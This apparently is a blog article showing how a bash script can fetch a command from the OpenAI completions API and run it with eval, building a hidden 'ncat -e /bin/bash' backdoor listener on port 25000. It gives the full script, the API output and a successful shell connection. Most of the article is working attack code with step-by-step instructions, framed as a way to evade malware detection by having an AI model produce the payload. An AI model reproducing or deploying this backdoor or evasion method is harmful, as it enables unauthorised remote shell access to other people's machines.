How chatgpt can be used to hack computers.
Current security systems can detect malware by examining their code, but what if the code is generated from an AI like chatgpt which in…
Current security systems can detect malware by examining their code, but what if the code is generated from an AI like chatgpt which in turn generates code from input text? lets see a real-life example of how this can be done. Note that this article does intend to teach you to hack using chatgpt but rather inform you of new dangerous methods of hacking!, if you try to use this method for educational purposes, use it only on your computer by acknowledging any potential problems that you might cause to your security.
Write the following code and save it as revchatgpt.sh
I will not explain all the parameters but rather the most important
#!/bin/bash
eval "nohup $(curl https://api.openai.com/v1/completions \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer YOUR_API_KEY' \
-d '{
"model": "text-davinci-003",
"prompt": "use ncat command to create a listener in port 25000 without explaination",
"max_tokens": 1024,
"temperature": 0
}' 2>/dev/null | jq .choices[0].text | tr -d '"' | cut -c 5-) -e /bin/bash &"- YOUR_API_KEY: The chatgpt authorization key used by the curl command.
- prompt: “use ncat command to create a listener in port 25000 without explaination” This actually asks to create an ncat command that will create a listener on port 25000, a non privileged port.
curl output:
$ curl https://api.openai.com/v1/completions \
> -H 'Content-Type: application/json' \
> -H 'Authorization: Bearer YOUR_API_KEY' \
> -d '{
> "model": "text-davinci-003",
> "prompt": "use ncat command to create a listener in port 25000 without explaination",
"max_> "max_tokens": 1024,
> "temperature": 0
> }' 2>/dev/null
{"id":"cmpl-6Z3KvzPJVOhoM2z3gGqkkn8HbHtKD","object":"text_completion","created":1673812325,"model":"text-davinci-003","choices":[{"text":"\n\nncat -l 25000","index":0,"logprobs":null,"finish_reason":"stop"}],"usage":{"prompt_tokens":15,"completion_tokens":8,"total_tokens":23}}The result output after being filtered by commands
jq .choices[0].text | tr -d '"' | cut -c 5-Will create this command, this command create a TCP listener on port 25000
ncat -l 25000Then it will merged with additional text and will create the following , this command if executed will run in the background and execute the bash shell if someone connects to port 25000 of this host.
"nohup ncat -l 25000 -e /bin/bash &"Finally, the command is executed by the eval statement.
After execution, we can run the ss or netstat command and verify that is listening on port 25000
$ ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 10 0.0.0.0:25000 0.0.0.0:* users:(("ncat",pid=2244,fd=4))
LISTEN 0 10 [::]:25000 [::]:* users:(("ncat",pid=2244,fd=3))Lets try to connect now to the host using ncat
$ ncat 0.0.0.0 25000
ls
Downloads
a.txt
backdoor.sh
chatgpt.key
docker
go
logs
nohup.out
rexec.sh
scripts
test
hostname
nautilusWe can see that we can connect and execute commands! we have gained shell access by a script which we ask chatgpt to generate commands we executed!.
Conclusion
I am not a security expert so I don’t have a good view if this is a new threat on the horizon, but can current security systems detect malware payloads that do not contain malicious code but only simple text? will we face a new era of AI-powered threats?
